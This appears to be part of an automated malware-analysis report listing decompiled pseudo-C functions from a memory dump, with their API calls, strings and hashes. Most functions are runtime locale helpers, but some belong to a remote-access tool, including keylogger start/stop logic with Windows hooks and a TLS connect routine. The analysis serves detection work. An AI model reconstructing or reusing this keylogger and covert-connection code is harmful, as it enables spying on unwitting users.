                              						__eflags = _t16;
                              						if(_t16 == 0) {
                              							_t16 = GetACP();
                              						}
                              						L25:
                              						return _t16;
                              					}
                              					L22:
                              					_t16 = 0;
                              					goto L25;
                              				}
                              				_t17 = 0;
                              				if( *_t23 == 0) {
                              					goto L21;
                              				}
                              				_t34 = 0x459f98;
                              				_t25 = _t23;
                              				while(1) {
                              					_t30 =  *_t25;
                              					if(_t30 !=  *_t34) {
                              						break;
                              					}
                              					if(_t30 == 0) {
                              						L7:
                              						_t26 = _t17;
                              						L9:
                              						if(_t26 == 0) {
                              							goto L21;
                              						}
                              						_t36 = 0x459fa0;
                              						_t27 = _t23;
                              						while(1) {
                              							_t31 =  *_t27;
                              							if(_t31 !=  *_t36) {
                              								break;
                              							}
                              							if(_t31 == 0) {
                              								L17:
                              								_t48 = _t17;
                              								if(_t17 != 0) {
                              									_t16 = E0043604F(_t23, _t23);
                              									goto L25;
                              								}
                              								if(E00441069(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                              									goto L22;
                              								}
                              								_t16 = _v8;
                              								goto L25;
                              							}
                              							_t32 =  *((intOrPtr*)(_t27 + 2));
                              							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
                              								break;
                              							}
                              							_t27 = _t27 + 4;
                              							_t36 = _t36 + 4;
                              							if(_t32 != 0) {
                              								continue;
                              							}
                              							goto L17;
                              						}
                              						asm("sbb eax, eax");
                              						_t17 = _t17 | 0x00000001;
                              						__eflags = _t17;
                              						goto L17;
                              					}
                              					_t33 =  *((intOrPtr*)(_t25 + 2));
                              					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
                              						break;
                              					}
                              					_t25 = _t25 + 4;
                              					_t34 = _t34 + 4;
                              					if(_t33 != 0) {
                              						continue;
                              					}
                              					goto L7;
                              				}
                              				asm("sbb edx, edx");
                              				_t26 = _t25 | 0x00000001;
                              				__eflags = _t26;
                              				goto L9;
                              			}

                              APIs
                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00448BC2,?,00000050,?,?,?,?,?), ref: 00448A42
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ACP$OCP
                              • API String ID: 0-711371036
                              • Opcode ID: d9c45d5da0b8590e3521e2617c67b21db9c57a03ad6415d3095a97cbf1f12796
                              • Instruction ID: eb9ed3db0900569e2555f6122bd78d83f5855a47a67a592497b5360646255e9a
                              • Opcode Fuzzy Hash: d9c45d5da0b8590e3521e2617c67b21db9c57a03ad6415d3095a97cbf1f12796
                              • Instruction Fuzzy Hash: 302106A2A00501A6FB348E559802BBF7366EB94B51F56802FE905F7301EF3ADD41C35A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E004049D2(void* __edx, char _a4) {
                              				void* __ebx;
                              				void* __ecx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t12;
                              				signed int _t15;
                              				void* _t16;
                              				void* _t22;
                              				void* _t23;
                              				signed int _t25;
                              				void* _t31;
                              				char* _t32;
                              				void* _t33;
                              
                              				_t22 = _t23;
                              				_t32 =  &_a4;
                              				_t2 = _t22 + 8; // 0x46db88
                              				_t12 = _t2;
                              				_t31 = _t12;
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsd");
                              				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10);
                              				if(_t12 != 0) {
                              					L5:
                              					return 0;
                              				}
                              				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
                              					L9:
                              					return 1;
                              				}
                              				_t15 = E0041C076(_t22, _t23);
                              				 *(_t22 + 0x44) = _t15;
                              				if(_t15 == 0) {
                              					goto L5;
                              				}
                              				_t30 =  *((intOrPtr*)(_t22 + 4));
                              				_t16 = E0041C0C4(_t15,  *((intOrPtr*)(_t22 + 4)));
                              				_t25 =  *(_t22 + 0x44);
                              				if(_t16 == 1) {
                              					if(L0041CB45() == 1) {
                              						goto L9;
                              					}
                              					_t34 = _t33 - 0x18;
                              					E00402064(_t22, _t33 - 0x18, "TLS Authentication failed");
                              					E00402064(_t22, _t34 - 0x18, "[ERROR]");
                              					_t16 = E0041C23F(E004165D8(_t22, _t31),  *(_t22 + 0x44));
                              					_t25 =  *(_t22 + 0x44);
                              				}
                              				E0041C0BB(_t16, _t22, _t25, _t30, _t31, _t32);
                              				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
                              				goto L5;
                              			}

                              APIs
                              • connect.WS2_32(?,0046DB88,00000010), ref: 004049ED
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: connect
                              • String ID: TLS Authentication failed$[ERROR]
                              • API String ID: 1959786783-1964023390
                              • Opcode ID: a0453b0af56f1dce6b96b2c1e2c6577e21eb645f310f987bcb19a5c47a82d2d8
                              • Instruction ID: 152706162a58c733358066f3432b6da4ca359658ad3caf7888de26e0204257cf
                              • Opcode Fuzzy Hash: a0453b0af56f1dce6b96b2c1e2c6577e21eb645f310f987bcb19a5c47a82d2d8
                              • Instruction Fuzzy Hash: 6401E9717802005BCF18BFB59A8657A3B56DF82305B04406BEE01AF2C7E97ADC44876E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E004165D8(void* __ebx, void* __edi, char _a4, char _a28) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				signed short _v102;
                              				signed short _v104;
                              				signed short _v106;
                              				signed short _v108;
                              				signed int _t57;
                              				struct _SYSTEMTIME* _t59;
                              
                              				_t59 = (_t57 & 0xfffffff8) - 0x70;
                              				_t61 =  *0x46bb07;
                              				if( *0x46bb07 != 0) {
                              					GetLocalTime(_t59);
                              					_push(_v102 & 0x0000ffff);
                              					_push(_v104 & 0x0000ffff);
                              					_push(_v106 & 0x0000ffff);
                              					_t7 =  &_a4; // 0x404a5a
                              					E004047F8(_t61, L00401F75(E0040530D(__ebx,  &_v100, L00402F73(__ebx,  &_v76, E0040530D(__ebx,  &_v52, E004075E8( &_v28, "%02i:%02i:%02i:%03i ", _t61, _t7), __edi, _t61, " "), _t61,  &_a28), __edi, _t61, "\n")), _v108 & 0x0000ffff);
                              					L00401FA7();
                              					L00401FA7();
                              					L00401FA7();
                              					L00401FA7();
                              				}
                              				L00401FA7();
                              				return L00401FA7();
                              			}

                              APIs
                              • GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: LocalTime
                              • String ID: %02i:%02i:%02i:%03i $ZJ@
                              • API String ID: 481472006-4006433000
                              • Opcode ID: e0da1838b9dbf299b852b96bc5900241f7eebd36658fbaaf16804b458b3330c9
                              • Instruction ID: 91ad0787fd8fe1f6f1bb0b9fd36296fe35f2cd8cc1b5ade7d46838038b6d9cab
                              • Opcode Fuzzy Hash: e0da1838b9dbf299b852b96bc5900241f7eebd36658fbaaf16804b458b3330c9
                              • Instruction Fuzzy Hash: D5113DB150834556C704FBA5DC55CABB3E8AA44308F500A3FB895D30E1FF3CEA49C65A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E004095AB(void* __ebx, struct HHOOK__** __ecx) {
                              				char _v28;
                              				void* __edi;
                              				struct HHOOK__** _t27;
                              				void* _t28;
                              
                              				_t17 = __ebx;
                              				_t27 = __ecx;
                              				if( *((char*)(__ecx + 0x49)) == 0) {
                              					__eflags = 0;
                              					return 0;
                              				}
                              				_t33 =  *0x46a9d4 - 0x32;
                              				_t26 = "Offline Keylogger Stopped";
                              				if( *0x46a9d4 != 0x32) {
                              					E00402064(__ebx,  &_v28, "Offline Keylogger Stopped");
                              					_t28 = _t28 - 0x18;
                              					L00416C32(_t28,  &_v28);
                              					E00409636(__ebx, _t27, _t33);
                              					L00401FA7();
                              				}
                              				_t29 = _t28 - 0x18;
                              				E00402064(_t17, _t28 - 0x18, _t26);
                              				E00402064(_t17, _t29 - 0x18, "[Info]");
                              				E004165D8(_t17, _t26);
                              				_t27[0x12] = 0;
                              				if(_t27[0x12] == 0 &&  *_t27 != 0) {
                              					UnhookWindowsHookEx( *_t27);
                              					 *_t27 =  *_t27 & 0x00000000;
                              				}
                              				return 1;
                              			}

                              APIs
                              • UnhookWindowsHookEx.USER32(?), ref: 00409621
                                • Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
                                • Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: EventHookLocalTimeUnhookWindowswsprintf
                              • String ID: Offline Keylogger Stopped$[Info]
                              • API String ID: 2949427887-1791908007
                              • Opcode ID: 2eede6a45286f0b92d76a8083913078e6b473394a1b3c67eac4823fa027206c7
                              • Instruction ID: f59fa6ee72642e8cb032df677130fc087113d3809d92fc1fd18dfcd0b65af9b3
                              • Opcode Fuzzy Hash: 2eede6a45286f0b92d76a8083913078e6b473394a1b3c67eac4823fa027206c7
                              • Instruction Fuzzy Hash: 3201D231A0460057DB297779C90B3BE7BA14B42305F40047FD982222D3EABE495AC7DB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 28%
                              			E0044132F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                              				signed int _v8;
                              				signed int _t18;
                              				intOrPtr* _t31;
                              				signed int _t33;
                              
                              				_t26 = __ecx;
                              				_push(__ecx);
                              				_t18 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t18 ^ _t33;
                              				_push(__esi);
                              				_t31 = L00440C46(0x16, "LCMapStringEx", 0x4590ec, 0x4590f4);
                              				if(_t31 == 0) {
                              					LCMapStringW(E004413B7(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                              				} else {
                              					 *0x45346c(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                              					 *_t31();
                              				}
                              				return E0042F61B(_v8 ^ _t33);
                              			}

                              APIs
                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,00428772), ref: 004413A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: String
                              • String ID: LCMapStringEx$@
                              • API String ID: 2568140703-230199810
                              • Opcode ID: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
                              • Instruction ID: 328293ae2da74c3881d3de9e1e1d62cea5772e6c780c88eb29c835c9fd5874b5
                              • Opcode Fuzzy Hash: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
                              • Instruction Fuzzy Hash: 3C012532500209FBDF125F90DC02EEE7F62EF08755F004126FE0426161CA3AC971EB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004401EB,?,00000000,00401D19), ref: 00441182
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FormatTime
                              • String ID: GetTimeFormatEx$@
                              • API String ID: 3606616251-597012884
                              • Opcode ID: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
                              • Instruction ID: 597dd883ab71028faa77f39812b87aa423b0666660f34cf126ad643169d29e88
                              • Opcode Fuzzy Hash: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
                              • Instruction Fuzzy Hash: DCF0C83164021CFBDF126F61DC02EAF7F21EF08B51F10452AFE05172A1CA798D259B99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 39%
                              			E00441199(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				signed int _t7;
                              				void* _t20;
                              				intOrPtr* _t23;
                              				signed int _t25;
                              
                              				_t20 = __edx;
                              				_t16 = __ecx;
                              				_push(__ecx);
                              				_t7 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t7 ^ _t25;
                              				_t23 = L00440C46(0x11, "GetUserDefaultLocaleName", 0x4590a4, "GetUserDefaultLocaleName");
                              				if(_t23 == 0) {
                              					E004412C5(__ebx, _t16, _t20, __edi, _t23, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
                              				} else {
                              					 *0x45346c(_a4, _a8);
                              					 *_t23();
                              				}
                              				return E0042F61B(_v8 ^ _t25);
                              			}

                              APIs
                              • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00448438,?,00000055,00000050), ref: 004411E3
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DefaultUser
                              • String ID: GetUserDefaultLocaleName$@
                              • API String ID: 3358694519-2432190263
                              • Opcode ID: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
                              • Instruction ID: 3ac9f703888ec721985dbf6bd802d6cf8197e55589d78a152d54f94c28d6ea82
                              • Opcode Fuzzy Hash: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
                              • Instruction Fuzzy Hash: 90F02B30600218FBDB106F61DC02E5E7FA0EF04B11F104466FD05561A2DA758E149BDD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 25%
                              			E00441262(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
                              				signed int _v8;
                              				signed int _t5;
                              				intOrPtr* _t18;
                              				signed int _t20;
                              
                              				_t13 = __ecx;
                              				_push(__ecx);
                              				_t5 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t5 ^ _t20;
                              				_push(__esi);
                              				_t18 = L00440C46(0x15, "IsValidLocaleName", 0x4590d0, "IsValidLocaleName");
                              				if(_t18 == 0) {
                              					IsValidLocale(E004413B7(_t13, _t18, __eflags, _a4, 0), 1);
                              				} else {
                              					 *0x45346c(_a4);
                              					 *_t18();
                              				}
                              				return E0042F61B(_v8 ^ _t20);
                              			}

                              APIs
                              • IsValidLocale.KERNEL32(00000000,0043CFD0,00000000,00000001,?,?,0043CFD0,?,?,0043C9B0,?,00000004), ref: 004412AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: LocaleValid
                              • String ID: IsValidLocaleName$@
                              • API String ID: 1901932003-2778040366
                              • Opcode ID: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
                              • Instruction ID: 51e1be3ffe8f4d9107f84abeff18eb9e3ab6bbbe641bbbca65fbd3cae13f37de
                              • Opcode Fuzzy Hash: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
                              • Instruction Fuzzy Hash: 23F05930640708F7DB106F20DC02FAE7B54DB00B12F10016AFD05B72D1DAB88D148A9D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 20%
                              			E00441200(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                              				signed int _v8;
                              				signed int _t8;
                              				intOrPtr* _t20;
                              				signed int _t22;
                              
                              				_push(__ecx);
                              				_t8 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t8 ^ _t22;
                              				_t20 = L00440C46(0x14, "InitializeCriticalSectionEx", 0x4590c8, 0x4590d0);
                              				if(_t20 == 0) {
                              					InitializeCriticalSectionAndSpinCount(_a4, _a8);
                              				} else {
                              					 *0x45346c(_a4, _a8, _a12);
                              					 *_t20();
                              				}
                              				return E0042F61B(_v8 ^ _t22);
                              			}

                              APIs
                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044437F,-00000020,00000FA0,00000000,?,?), ref: 0044124B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CountCriticalInitializeSectionSpin
                              • String ID: InitializeCriticalSectionEx$@
                              • API String ID: 2593887523-1288605549
                              • Opcode ID: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
                              • Instruction ID: d51398674981bb72eabf597e0de5951d7e9872e17945c585b36a5d9ca4153329
                              • Opcode Fuzzy Hash: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
                              • Instruction Fuzzy Hash: 98F02431600218FBCB115F50DC02EAEBF60EF04712B10406AFC096A271DA758E24DA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00435084), ref: 00441112
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Time$FileSystem
                              • String ID: GetSystemTimePreciseAsFileTime$@
                              • API String ID: 2086374402-2730348301
                              • Opcode ID: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
                              • Instruction ID: 905004eebb46221c2d070f6dd192413a4baa945a661a41a47a192c014b97a96b
                              • Opcode Fuzzy Hash: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
                              • Instruction Fuzzy Hash: 99E05531B40218F787116F24AC0293FBB60DB88B13B10027AFC0517293D9384E049AEE
                              Uniqueness

                              Uniqueness Score: -1.00%